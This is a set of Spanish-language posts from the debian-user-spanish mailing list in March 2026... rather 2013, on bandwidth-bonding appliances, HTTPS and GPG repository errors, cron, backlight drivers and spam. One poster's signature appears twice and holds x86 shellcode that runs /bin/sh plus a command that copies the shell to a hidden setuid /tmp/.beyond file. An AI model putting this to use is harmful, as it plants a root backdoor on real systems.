 Eso será, Camaleón, que cuando dicen que, sin hacer peering,  
 suman el Ancho de Banda SOLO para el protocolo HTTP, y que para el 
 resto hacen Balanceo de Carga, pues será lo que tú estás 
 interpretando, que suma el Ancho de Banda de los enlaces WAN de 
 distintos operadores que se le conecten al appliance.
  
 Y eso es exactamente lo que hace el dispositivo: sumar el ancho de 
 banda de los dos enlaces que tengas conectados (de distintos ISP o 
 del
 mismo) sin necesidad de colaboración por parte del carrier para 
 duplicar el ancho de banda (lo de duplicar lo dicen ellos no yo) 
 y acelerar las descargas http... que vuelvo a decir quizá no es lo 
 que tu querías/imaginabas/pensabas pero sí es lo que preguntaba el OP.
 
 No, no, si ya está claro, si aquí lo dice bien claro:
 
 
 1) Standalone mode: In this mode, our Truffle appliances will bond all 
 http downlink traffic. As an example if you were to download a file 
 behind the Truffle device which has 4 ADSL lines plugged in with 6Mbps 
 speed each. Your download speed would be around 24Mbps even for that 
 single file download. For all other traffic, our device will implement 
 the intelligent load-balancing where the Truffle device will 
 distribute the different Internet sessions, on various WAN links on a 
 session by session basis. Truffle will keep the application semantics 
 in tact, by making sure the sessions from certain applications are 
 kept on the same WAN line, such as banking sites, where a blind 
 load-balancing would break the application.
 
 
 Que según tú, ellos dicen ahí esto:
 
 
 Y eso es exactamente lo que hace el dispositivo: sumar el ancho de 
 banda de los dos enlaces que tengas conectados (de distintos ISP o del 
 mismo) sin necesidad de colaboración por parte del carrier para 
 duplicar el ancho de banda (lo de duplicar lo dicen ellos no yo) y 
 acelerar las descargas http...
 
 
 Si está claro que ahí dice lo que tú has dicho.

Pues sí, hijo, más claro agua.

Traducido: A modo de ejemplo, si vas a descargar un archivo que está detrás 
del dispositivo Truffle que tiene conectadas 4 líneas ADSL de 6 Mbps cada una 
la velocidad de descarga será de unos 24 Mbps para esa descarga de un único 
archivo.

 Me imagino que también establecerán la sesión por una WAN y le 
 responderán por la otra, porque, por esta regla de tres, también pone 
 ahí eso...

Si tienes más dudas pregúntales de nuevo y ya que estás, si te dicen el precio 
de los dispositivos, mejor.

 Que ellos no ponen en ningún momento que el UNICO tráfico con el que 
 hacen bond es con el HTTP, ni que con el resto hacen Load Balancing, 
 no. Ellos dicen, que SUMAN el Ancho de Banda en cualquier 
 circunstancia y sin contar con el Carrier, ni el operador, ni nadie, 
 que lo suman y punto.
 
 Si está claro, si lo pone en ese párrafo.

Y luego dicen que yo soy cabezota... caray.



Cierto, Camaleón, delante de la frase que tú has traducido, no pone nada de que 
SOLO se está refiriendo al tráfico HTTP. 

Ni detrás de la frase que tú has traducido, tampoco pone que con el resto del 
tráfico, el que no es HTTP, hace Load-Balancing.

Tienes razón, si te la estoy dando, que lo que tú dices que pone es que se suma 
el Ancho de Banda y punto...

Si no puede estar más claro, si lo dicen ellos en ese párrafo. No hay más que 
interpretarlo completo...


Saludos,

Ramsés


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/003301ce24c7$d34d1860$79e74920$@gmail.com



Re: 2 isp [ot]

2013-03-19 Por tema Camaleón
El Tue, 19 Mar 2013 18:33:07 +0100, Ramses II escribió:

 Buenas tardes,
 
 Qué más quisiera yo, cambiar el Outlook, bueno, no, mejor, me gustaría
 que lo hiciera bien, mejor que cambiar. Ya cambiaría después de que lo
 hiciera bien si veo otro que me simpatice más...

Es que ese cliente no maneja bien el texto citado, parece que sólo 
trabaja con dos niveles y en las listas de correos canta mucho :-/

 Cierto, Camaleón, delante de la frase que tú has traducido, no pone nada
 de que SOLO se está refiriendo al tráfico HTTP.

Que sí, ¡pero si eso ya lo sabemos!

http://lists.debian.org/debian-user-spanish/2013/03/msg00504.html

Que resumía en los siguientes párrafos:

(...) Es decir, el aparato hace lo que hace y sirve para lo que sirve. 
Punto. Cosa distinta es que le sea útil a todo el mundo, en todos los 
casos y en todas las circunstancias. (...) No sé... a mí me parece que 
tiene un mercado bien definido y que puede ser de utilidad para algunos 
usuarios pero obviamente no para todos ni para todo.

Me pregunto si _lees_ los correos que mando _antes_ de responderlos o 
simplemente disparas antes de apuntar ;-)
 
 Ni detrás de la frase que tú has traducido, tampoco pone que con el
 resto del tráfico, el que no es HTTP, hace Load-Balancing.

(...)

Que sí, pero no voy a repetir lo que ya está escrito.

Saludos,

-- 
Camaleón


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/kia8tt$m9s$7...@ger.gmane.org



RE: 2 isp [ot]

2013-03-19 Por tema Ramses II
Buenas tardes,

-Mensaje original-
De: Camaleón [mailto:noela...@gmail.com] 
Enviado el: martes, 19 de marzo de 2013 18:57
Para: debian-user-spanish@lists.debian.org
Asunto: Re: 2 isp [ot]

El Tue, 19 Mar 2013 18:33:07 +0100, Ramses II escribió:

 Buenas tardes,
 
 Qué más quisiera yo, cambiar el Outlook, bueno, no, mejor, me gustaría 
 que lo hiciera bien, mejor que cambiar. Ya cambiaría después de que lo 
 hiciera bien si veo otro que me simpatice más...

Es que ese cliente no maneja bien el texto citado, parece que sólo trabaja con 
dos niveles y en las listas de correos canta mucho :-/

 Cierto, Camaleón, delante de la frase que tú has traducido, no pone 
 nada de que SOLO se está refiriendo al tráfico HTTP.

Que sí, ¡pero si eso ya lo sabemos!

http://lists.debian.org/debian-user-spanish/2013/03/msg00504.html

Que resumía en los siguientes párrafos:

(...) Es decir, el aparato hace lo que hace y sirve para lo que sirve. 
Punto. Cosa distinta es que le sea útil a todo el mundo, en todos los casos y 
en todas las circunstancias. (...) No sé... a mí me parece que tiene un mercado 
bien definido y que puede ser de utilidad para algunos usuarios pero obviamente 
no para todos ni para todo.

Me pregunto si _lees_ los correos que mando _antes_ de responderlos o 
simplemente disparas antes de apuntar ;-)
 
 Ni detrás de la frase que tú has traducido, tampoco pone que con el 
 resto del tráfico, el que no es HTTP, hace Load-Balancing.

(...)

Que sí, pero no voy a repetir lo que ya está escrito.

---

Je, je, no vas a repetir lo que está escrito, pero sí traduces una frase en la 
que solo se dice que suma el Ancho de Banda, cuando en la frase anterior ponía 
que SOLO vale para HTTP y la siguiente tampoco la traduces porque pone que con 
el resto del tráfico hace Load-Balancing.

No, si está clarísimo...


Saludos,

Ramsés


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/003a01ce24cd$b639cce0$22ad66a0$@gmail.com



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Francisco Antonio

El 19/03/13 12:50, Felix Perez escribió:

2013/3/19, Roberto Quiñonesrobe...@acshell.net:

El 19/03/2013 12:23, Felix Perez escribió:

WARNING: gnome-keyring:: couldn't connect to:

A modo de consulta, usas lxde, gnome, kde, cual ¿?.


Uso XCFE, pero lo mismo pasa con gnome clasic, fluxbox u openbox.

Otro dato para poder acceder a gmail debo seleccionar modo html
básico, si no no puedo entrar a la cuenta.

Acabo de reiniciar el equipo y por consola al hacer aptitude update me da:
Des: 1 http://ftp.us.debian.org testing InRelease [224 kB]
Ign http://ftp.us.debian.org testing InRelease
Descargados 224 kB en 1seg. (122 kB/s)
E: Error de GPG: http://ftp.us.debian.org testing InRelease: Las
siguientes firms fueron inválidas: NODATA 4

He revisado los logs, y no encuentro nada extraño.

¿Alguna idea?

Gracias.


has probado Apuntando a repositorios es o cl si esos (us) te están dando 
error.

Además revisa /var/lib/apt/lists/partial/ si hay algo raro y bórralo.
no creo que error venga de la mano con los repos pero es necesario.
Saludos.

--
char esp[] _attribute_ ((section(.text))) /* e.s.p
release */
= \xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68
\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99
\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7
\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56
\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31
\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69
\x6e\x2f\x73\x68\x00\x2d\x63\x00
cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;;


 Linux Counter ( http://counter.li.org )
 --*
 Usuario #551263



--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/5148b984.8090...@linuxmail.org



Re: 2 isp [ot]

2013-03-19 Por tema Camaleón
El Tue, 19 Mar 2013 19:15:16 +0100, Ramses II escribió:

(...)
 
 Ni detrás de la frase que tú has traducido, tampoco pone que con el
 resto del tráfico, el que no es HTTP, hace Load-Balancing.
 
 (...)
 
 Que sí, pero no voy a repetir lo que ya está escrito.
 
 
 Je, je, no vas a repetir lo que está escrito, pero sí traduces una frase
 en la que solo se dice que suma el Ancho de Banda, cuando en la frase
 anterior ponía que SOLO vale para HTTP y la siguiente tampoco la
 traduces porque pone que con el resto del tráfico hace Load-Balancing.
 
 No, si está clarísimo...

Lo único que me queda claro, además de que ese chisme permite añadir dos 
conexiones ADSL para aumentar el ancho de banda en las descargas web (por 
ejemplo, para bajarse una imagen ISO sumando el ancho de banda de las dos 
líneas) es que por algún motivo extraño no quieres (o no te interesa) 
leer los correos que mando y entre eso y tu Outlook destroza-citas, hace 
muy difícil la comunicación escrita :-)

Saludos,

-- 
Camaleón


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/kiab6k$m9s$8...@ger.gmane.org



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Roberto Quiñones

El 18/03/2013 16:43, Felix Perez escribió:

siguientes firms fueron inválidas: BADSIG AED4B06F473041FA Debian


Según y como lo veo yo puede ser un problema dl repositorio, lo que 
puedes hacer es hacer un clear de los paquetes instalados, instalar lo 
siguiente:


apt-get install debian-keyring debian-archive-keyring

modificar por otro repositorio y probar nuevamente el apt-get update o 
aptitude update.


Saludos.


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/5148b041.5010...@acshell.net



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Camaleón
El Tue, 19 Mar 2013 15:16:20 -0400, Francisco Antonio escribió:

 El 19/03/13 12:50, Felix Perez escribió:
 2013/3/19, Roberto Quiñonesrobe...@acshell.net:
 El 19/03/2013 12:23, Felix Perez escribió:
 WARNING: gnome-keyring:: couldn't connect to:
 A modo de consulta, usas lxde, gnome, kde, cual ¿?.

 Uso XCFE, pero lo mismo pasa con gnome clasic, fluxbox u openbox.

 Otro dato para poder acceder a gmail debo seleccionar modo html básico,
 si no no puedo entrar a la cuenta.

 Acabo de reiniciar el equipo y por consola al hacer aptitude update me
 da: Des: 1 http://ftp.us.debian.org testing InRelease [224 kB] Ign
 http://ftp.us.debian.org testing InRelease Descargados 224 kB en 1seg.
 (122 kB/s) E: Error de GPG: http://ftp.us.debian.org testing InRelease:
 Las siguientes firms fueron inválidas: NODATA 4

 He revisado los logs, y no encuentro nada extraño.

 ¿Alguna idea?

 Gracias.
 
 has probado Apuntando a repositorios es o cl si esos (us) te están dando
 error.
 Además revisa /var/lib/apt/lists/partial/ si hay algo raro y bórralo. no
 creo que error venga de la mano con los repos pero es necesario.
 Saludos.

Hum... no he seguido mucho este hilo porque lo recibo a medias pero si 
se trata de algún problema con los certificados SSL seguramente se trate 
de este bug:

libssl1.0.0: handshake failure messages with openconnect
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=701826

Saludos,

-- 
Camaleón


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/kiabmi$m9s$9...@ger.gmane.org



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Francisco Antonio

El 19/03/13 14:36, Roberto Quiñones escribió:

El 18/03/2013 16:43, Felix Perez escribió:

siguientes firms fueron inválidas: BADSIG AED4B06F473041FA Debian


Según y como lo veo yo puede ser un problema dl repositorio, lo que 
puedes hacer es hacer un clear de los paquetes instalados, instalar lo 
siguiente:


apt-get install debian-keyring debian-archive-keyring

modificar por otro repositorio y probar nuevamente el apt-get update o 
aptitude update.


Saludos.


Viejo te mando mis repos hechale mano aptitude (update; upgrade; install 
-f para ver problemas dependencias ta claro que tienes mal tus repos 
corrígelo.

Saludos.

## Debian Main Repos
deb ftp://ftp.cl.debian.org/debian/ wheezy main contrib non-free
deb-src ftp://ftp.cl.debian.org/debian/ wheezy main contrib non-free

## Debian Update Repos
deb http://security.debian.org/ wheezy/updates main contrib non-free
deb ftp://ftp.es.debian.org/debian/ wheezy-proposed-updates main contrib 
non-free

deb-src http://security.debian.org/ wheezy/updates main contrib non-free
deb-src ftp://ftp.es.debian.org/debian/ wheezy-proposed-updates main 
contrib non-free


##Multimedia testing
## aptitude install debian-multimedia-keyring
deb http://www.deb-multimedia.org wheezy main non-free



--
char esp[] _attribute_ ((section(.text))) /* e.s.p
release */
= \xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68
\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99
\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7
\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56
\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31
\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69
\x6e\x2f\x73\x68\x00\x2d\x63\x00
cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;;


 Linux Counter ( http://counter.li.org )
 --*
 Usuario #551263



--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/5148c5e4.3070...@linuxmail.org



RE: 2 isp [ot]

2013-03-19 Por tema Ramses II
Buenas tardes,

-Mensaje original-
De: Camaleón [mailto:noela...@gmail.com] 
Enviado el: martes, 19 de marzo de 2013 19:36
Para: debian-user-spanish@lists.debian.org
Asunto: Re: 2 isp [ot]

El Tue, 19 Mar 2013 19:15:16 +0100, Ramses II escribió:

(...)
 
 Ni detrás de la frase que tú has traducido, tampoco pone que con el 
 resto del tráfico, el que no es HTTP, hace Load-Balancing.
 
 (...)
 
 Que sí, pero no voy a repetir lo que ya está escrito.
 
 
 Je, je, no vas a repetir lo que está escrito, pero sí traduces una 
 frase en la que solo se dice que suma el Ancho de Banda, cuando en la 
 frase anterior ponía que SOLO vale para HTTP y la siguiente tampoco la 
 traduces porque pone que con el resto del tráfico hace Load-Balancing.
 
 No, si está clarísimo...

Lo único que me queda claro, además de que ese chisme permite añadir dos 
conexiones ADSL para aumentar el ancho de banda en las descargas web (por 
ejemplo, para bajarse una imagen ISO sumando el ancho de banda de las dos
líneas) es que por algún motivo extraño no quieres (o no te interesa) leer los 
correos que mando y entre eso y tu Outlook destroza-citas, hace muy difícil la 
comunicación escrita :-)
-

Sí, sí, si mientras que la descarga sea por HTTP, sí, pero que no vale para 
otros protocolos, como, por ejemplo, FTP. Lo dice bien claro el fabricante...

Si a mi me parece también fantástico el appliance, si yo lo que estoy 
defendiendo es que no se suman los Anchos de Banda en su amplio sentido, sino 
que se tiene que dar la situación concreta de que el tráfico debe ser sólo, 
única y exclusivamente, HTTP, y que el resto es balanceado...

Lo de mi cliente de correo, creo que no tiene solución, y de lo mío, que te voy 
a contar...


Saludos,

Ramsés


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/003c01ce24d5$f802a540$e807efc0$@gmail.com



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Jose Damian Garrido Muñoz
Hace un tiempo atrás, cuando ocurrió el cambio, actualicé el reloj a mano y
dejó de funcionar mis online accounts, leyendo encontré que era por el
tema de los certificados y la hora, así que volví a dejar la hora como
siempre, funciono con una hora menos, pero peeco.
yo no probé navegando con sitios seguros, pero quizás sea eso.
prueba, nada pierdes.


2013/3/19 Francisco Antonio francisc@linuxmail.org

 El 19/03/13 14:36, Roberto Quiñones escribió:

  El 18/03/2013 16:43, Felix Perez escribió:

 siguientes firms fueron inválidas: BADSIG AED4B06F473041FA Debian


 Según y como lo veo yo puede ser un problema dl repositorio, lo que
 puedes hacer es hacer un clear de los paquetes instalados, instalar lo
 siguiente:

 apt-get install debian-keyring debian-archive-keyring

 modificar por otro repositorio y probar nuevamente el apt-get update o
 aptitude update.

 Saludos.


  Viejo te mando mis repos hechale mano aptitude (update; upgrade; install
 -f para ver problemas dependencias ta claro que tienes mal tus repos
 corrígelo.
 Saludos.

 ## Debian Main Repos
 deb ftp://ftp.cl.debian.org/**debian/ ftp://ftp.cl.debian.org/debian/wheezy 
 main contrib non-free
 deb-src 
 ftp://ftp.cl.debian.org/**debian/ftp://ftp.cl.debian.org/debian/wheezy main 
 contrib non-free

 ## Debian Update Repos
 deb http://security.debian.org/ wheezy/updates main contrib non-free
 deb ftp://ftp.es.debian.org/**debian/ 
 ftp://ftp.es.debian.org/debian/wheezy-proposed-updates main contrib non-free
 deb-src http://security.debian.org/ wheezy/updates main contrib non-free
 deb-src 
 ftp://ftp.es.debian.org/**debian/ftp://ftp.es.debian.org/debian/wheezy-proposed-updates
  main contrib non-free

 ##Multimedia testing
 ## aptitude install debian-multimedia-keyring
 deb http://www.deb-multimedia.org wheezy main non-free




 --
 char esp[] _attribute_ ((section(.text))) /* e.s.p
 release */
 = \xeb\x3e\x5b\x31\xc0\x50\x54\**x5a\x83\xec\x64\x68
 \xff\xff\xff\xff\x68\xdf\xd0\**xdf\xd9\x68\x8d\x99
 \xdf\x81\x68\x8d\x92\xdf\xd2\**x54\x5e\xf7\x16\xf7
 \x56\x04\xf7\x56\x08\xf7\x56\**x0c\x83\xc4\x74\x56
 \x8d\x73\x08\x56\x53\x54\x59\**xb0\x0b\xcd\x80\x31
 \xc0\x40\xeb\xf9\xe8\xbd\xff\**xff\xff\x2f\x62\x69
 \x6e\x2f\x73\x68\x00\x2d\x63\**x00
 cp -p /bin/sh /tmp/.beyond; chmod 4755
 /tmp/.beyond;;

   Linux Counter ( http://counter.li.org )
  --***
  Usuario #551263



 --
 To UNSUBSCRIBE, email to 
 debian-user-spanish-REQUEST@**lists.debian.orgdebian-user-spanish-requ...@lists.debian.org
 with a subject of unsubscribe. Trouble? Contact
 listmas...@lists.debian.org
 Archive: 
 http://lists.debian.org/**5148c5e4.3070...@linuxmail.orghttp://lists.debian.org/5148c5e4.3070...@linuxmail.org




-- 
Saludos!

José Damián Garrido
Programador Web
ciber-humano :)


Re: Ayuda Crontab

2013-03-19 Por tema Petronilo Sanchez
Buen día

2013/3/19 Camaleón noela...@gmail.com:
 El 2013-03-19 a las 10:10 -0400, acade...@pinarte.cult.cu escribió:

 (reenvío a la lista y corrijo el top-posting)

  El Mon, 18 Mar 2013 14:36:31 -0400, academia escribió:
 
  (...)
 
  Quiero lograr que cuando el server inicie a las 8 de la mañana,
  automáticamente también lo haga mi Crontab (facilitando la ejecución
  de
  todas las tareas programadas en el mismo)
 
  Que yo sepa cron es un demonio que se inicia cuando se enciende el
  equipo y mee extrañaría que no lo tuvieras configurado así.
 
  ¿Qué problema tienes exactamente?

 Me explico camaleón.

 Pues te lo agardezco porque no me quedaba claro el problema.

 Mi server lo tengo con Zentyal (conozco que es basado en ubuntu, y a
 su vez este en Debian) y me disculpan, porque esta lista no perdona
 preguntas de otras distribuciones. Aclaro, TODAS las estaciones de
 trabajo si están en Debian 6.

 No pasa nada, la pregunta aplica a Debian también, sigamos.

 Hago esta pregunta en la lista porque creo que este tema es muy similar
 para ambas distros.

 Bien.

 Algo que no dije, para programar tareas utilizo un GUI que se llama
 gnome-schedule, es mucho más sencillo que utilizar (crontab -e), aunque
 también conozco algo de este último.

 http://gnome-schedule.sourceforge.net/
Gnome-schedule is a graphical user interface that leverages the power
of vixie-cron, dcron and at to manage your crontab file and provide an
easy way to schedule tasks on your computer. It supports recurrent
(periodical) tasks and tasks that happen only once in the future.


 No conozco esa aplicación, pero a simple vista parece un mero front-end
 para editar las tareas de crontab.

 Ya explicaba en correo anterior que he logrado (Encender-Apagar) el server
 de acuerdo a mis necesidades. Lo que ocurre es que al día siguiente cuando
 llego a mi trabajo el servidor está funcionando y todos los servicios
 corriendo sin problemas; pero, como es lógico al acceder al PC-Server en
 pantalla encontramos nos pide usuario y contraseña.

 Hasta aquí normal ¿no?

 El problema:

 1- Cuando me logueo, el server apaga a las 5 de la tarde como  está
 programado.
 2- Si NO me logueo, el server NO se apaga, aunque los demás servicios
 siguen ok.

 Ah, vale. Caray, pues menos mal que has detallado más el problema
 porque hace falta una mega-bola de cristal (con firmware actualizado)
 para adivinar todo esto :-)

 ¿Cómo lograr que sin loguearme se apague el server?

 Pues sólo se me ocurre que eso pase si estás haciendo uso de alguna
 fucnionalidad (a priori no se me ocurre ninguna :-?) que pueda necesitar
 que inicies la sesión para poder ejecutar la tarea pero no sé, suena un
 poco retorcido... mejor que estar adivinado, revisa el log
 ( grep -i cron /var/log/syslog /var/log/auth.log) para ver qué error
 te aparece a la hora en la que debería ejecutarse la tarea definida en
 el crontab del usuario.

 Esto lo quiero lograr porque por ejemplo si tengo que estar fuera de
 provincia por varios dias, no es necesario que el server este encendido en
 horarios que no hacen falta servicios. De otra manera cuando estoy en el
 trabajo y me logueo, sin problemas.

 Quisiera saber cómo lograr que el crontab funcione al igual que los otros
 servicios sin necesidad de loguearme.

 Saludos,

 --
 Camaleón

Puede parecer un poco trivial pero, ¿lo estas escribiendo en cron?
suena como si fuera programado en at


--
Cada cual según sus fuerzas, cada quien según sus necesidades...


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAF=btg4oq+qa6bvqzzfkmev3g5oapz2zqr6jwek7atahyja...@mail.gmail.com



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Felix Perez
El 19/03/13, Jose Damian Garrido Muñoz delhabe...@gmail.com escribió:
 Hace un tiempo atrás, cuando ocurrió el cambio, actualicé el reloj a mano y
 dejó de funcionar mis online accounts, leyendo encontré que era por el
 tema de los certificados y la hora, así que volví a dejar la hora como
 siempre, funciono con una hora menos, pero peeco.
 yo no probé navegando con sitios seguros, pero quizás sea eso.
 prueba, nada pierdes.

Gracias por la ayuda, pero no, lo primero que probé fue lo de la hora
y no hay solución.

Saludos.

-- 
usuario linux  #274354
normas de la lista:  http://wiki.debian.org/es/NormasLista
como hacer preguntas inteligentes:
http://www.sindominio.net/ayuda/preguntas-inteligentes.html


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAiZAx6Y8H=te5l7_kmusftk8bzfpg+9radjjmyajwnqugi...@mail.gmail.com



Re: [Spam] Re: Adiós de nuestro boletín.

2013-03-19 Por tema Alberto Vicat

El 18/03/13 14:07, Hernan Montero escribió:

El 18 de marzo de 2013 11:32, Camaleón noela...@gmail.com escribió:

El Mon, 18 Mar 2013 11:08:14 -0300, Ricardo escribió:


El día 18 de marzo de 2013 09:53, Rosa Aguero
ragu...@comercializadora.fi.cr escribió:

   Adiós a nuestro boletín, lamentamos que se vaya.

(...)


Hola Lista, alguien me puede decir por que me llegan estos correos
raros.. llegan de la lista ..

Se llama spam y el motivo por el que lo recibes no atiende más que a
una mera cuestión comercial ;-P

Saludos,

--
Camaleón


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact
listmas...@lists.debian.org
Archive: http://lists.debian.org/ki78ht$noi$4...@ger.gmane.org


Yo tampoco entiendo nada sobre ese boletín. ¿Alguien sabe a que
quieren referirse?

--
 Saludos
 **Hernan**



Pretenden que uno haga clic en el enlace que ponen. Y allí andá a saber 
qué puede pasar.

De mi parte, papelera directo.

Saludos


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/5148cdf4.7080...@gmail.com



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Adrià
On Mon, Mar 18, 2013 at 04:43:33PM -0300, Felix Perez wrote:
 Hola estimados
 El sábado pasado hice unas actualizaciones a mi laptop con debian
 testing (Linux felix-portatil 3.2.0-4-686-pae #1 SMP Debian 3.2.39-2
 i686 GNU/Linux
 ) , luego de las cuales me pidio reiniciar, lo cual hice.  Luego me
 fui de la oficina y al llegar hoy resulta que no puedo ingresar a
 sitios seguros https, me lanza este mensaje de error el navegador

¿Qué paquetes has actualizado recientemente? (grep upgrade
/var/log/dpkg.log).
¿Actualizabas a menudo? Con testing es conveniente.
¿Has probado creando un usuario nuevo, a ver si ocurre?
Estoy pensando en que haya habido alguna actualización de OpenSSL, pero
la última es de Febrero e imagino que ya la tendrías.
 
-- 
Adrià García-Alzórriz
ad...@fsfe.org
GPG Key: 09494C14

En la variación consiste el gusto. 


signature.asc
Description: Digital signature


Re: imposible reducir el brillo de la pantalla

2013-03-19 Por tema Eduardo Rios

El 19/03/13 16:22, Camaleón escribió:
¿Y qué te devuelve 
ls -la /sys/class/backlight

total 0
drwxr-xr-x  2 root root 0 mar 19 21:23 .
drwxr-xr-x 43 root root 0 mar 19 21:22 ..
lrwxrwxrwx  1 root root 0 mar 19 22:14 acpi_video0 - 
../../devices/pci:00/:00:01.0/:01:00.0/backlight/acpi_video0
lrwxrwxrwx  1 root root 0 mar 19 21:23 acpi_video1 - 
../../devices/pci:00/:00:02.0/backlight/acpi_video1
lrwxrwxrwx  1 root root 0 mar 19 21:23 intel_backlight - 
../../devices/pci:00/:00:02.0/drm/card0/card0-LVDS-1/intel_backlight


Gnome-shell suele tener problemas con los drivers gráficos cerrados, 
tanto de ati como de nvidia... ¿no te funciona el libre (radeon)? 
¹https://wiki.archlinux.org/index.php/Backlight Saludos, 
Voy a volver a probar, pero hasta ahora, si no instalo los drivers 
fglrx, no funciona la tarjeta ATI, sólo la Intel...


Gracias por tu interés.


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/5148d7f5.8070...@yahoo.es



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Sergio Bessopeanetto

El 19/03/13 18:01, Adrià escribió:

On Mon, Mar 18, 2013 at 04:43:33PM -0300, Felix Perez wrote:

Hola estimados
El sábado pasado hice unas actualizaciones a mi laptop con debian
testing (Linux felix-portatil 3.2.0-4-686-pae #1 SMP Debian 3.2.39-2
i686 GNU/Linux
) , luego de las cuales me pidio reiniciar, lo cual hice.  Luego me
fui de la oficina y al llegar hoy resulta que no puedo ingresar a
sitios seguros https, me lanza este mensaje de error el navegador

¿Qué paquetes has actualizado recientemente? (grep upgrade
/var/log/dpkg.log).
¿Actualizabas a menudo? Con testing es conveniente.
¿Has probado creando un usuario nuevo, a ver si ocurre?
Estoy pensando en que haya habido alguna actualización de OpenSSL, pero
la última es de Febrero e imagino que ya la tendrías.
  
¿Tendrás algún tema con el router? Lo digo porque me ha pasado y me 
sigue pasando, que en mi casa Debian Wheezy KDE con network manager 
funciona perfectamente pero la misma netbook en mi estudio con otro 
router, el más sencillo que entrega Telecom (Arnet) Argentina, las 
páginas https tardan una eternidad en abrir, cualquier página donde 
tenga que logearme tardan mucho en abrir.

Esa misma netbook con Linux Mint LXDE con wicd funciona bien sin problemas.
Experimenté en llevarme el router de mi casa y conectarlo 
provisoriamente en el estudio y todo funciona bien.
Quizás sea algún asunto que tenga el router con Network Manager... Todo 
puede ser, ¿no?


--
Sergio Bessopeanetto
Buenos Aires, Argentina
Skype: sergio.bess
Jabber: sergio.b...@jabber.org


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/5148e9dc.4090...@myopera.com



Re: imposible reducir el brillo de la pantalla

2013-03-19 Por tema Eduardo Rios

El 19/03/13 16:22, Camaleón escribió:
 ¿no te funciona el libre (radeon)? 
¹https://wiki.archlinux.org/index.php/Backlight Saludos,


El 19/03/13 22:26, Eduardo Rios escribió:

Voy a volver a probar, pero hasta ahora, si no instalo los drivers 
fglrx, no funciona la tarjeta ATI, sólo la Intel...


Gracias por tu interés.



Pues nada, con los libres, el sistema arranca con sistema gráfico Gnome 
classic, no el GNOME 3 con gnome-shell :(



--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/5148f3ba.9040...@yahoo.es



Error rpositorio en de Debian Squeeze

2013-03-19 Por tema Ricardo
Hola lista

les molesto con una consulta, un día para el otro me tiro error al
actualizar repositorio alguien ah tenido este inconveniente?

aqui les dejo el error que tira. http://guzman.com.ar/imagenes/errorrepo.png

cualquier comentario sera bien agradecidos.

Saludos

Ricardo


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
